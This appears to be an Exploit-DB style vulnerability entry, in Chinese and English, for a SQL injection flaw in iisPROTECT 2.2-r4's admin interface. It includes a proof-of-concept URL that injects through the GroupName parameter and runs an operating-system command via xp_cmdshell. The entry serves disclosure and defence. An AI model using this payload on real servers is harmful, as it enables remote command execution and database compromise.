https://www.exploit-db.com/exploits/22639
https://www.securityfocus.com/bid/82782
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200306-057

iisPROTECT2.2-r4版本及可能更早版本中基于Web的管理界面存在SQL注入漏洞。远程攻击者借助特定变量插入任意SQL并执行代码，正如SiteAdmin.ASP中使用的GroupName变量。

source: http://www.securityfocus.com/bid/7675/info

The IISProtect web administration interface does not properly sanitize user input. This could allow for SQL injection attacks on a Microsoft IIS server running IISProtect.

Successful exploitation could result in a compromise of the IISProtect server, attacks on the database or other consequences. 

http://www.example.com/iisprotect/admin/SiteAdmin.ASP?V_SiteName=&V_FirstTab=Groups&V_SecondTab=All&GroupName=gyrniff_gr';exec%20maste
r..xp_cmdshell'ping%2010.10.10.11';--

This example invokes the 'xp_cmdshell' stored procedure to execute the ping command on the host operating system.

iisProtect iisProtect 2.2 R4

来源:BUGTRAQ
名称:20030523iisPROTECTSQLinjectioninadmininterface
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=105370528728225&w;=2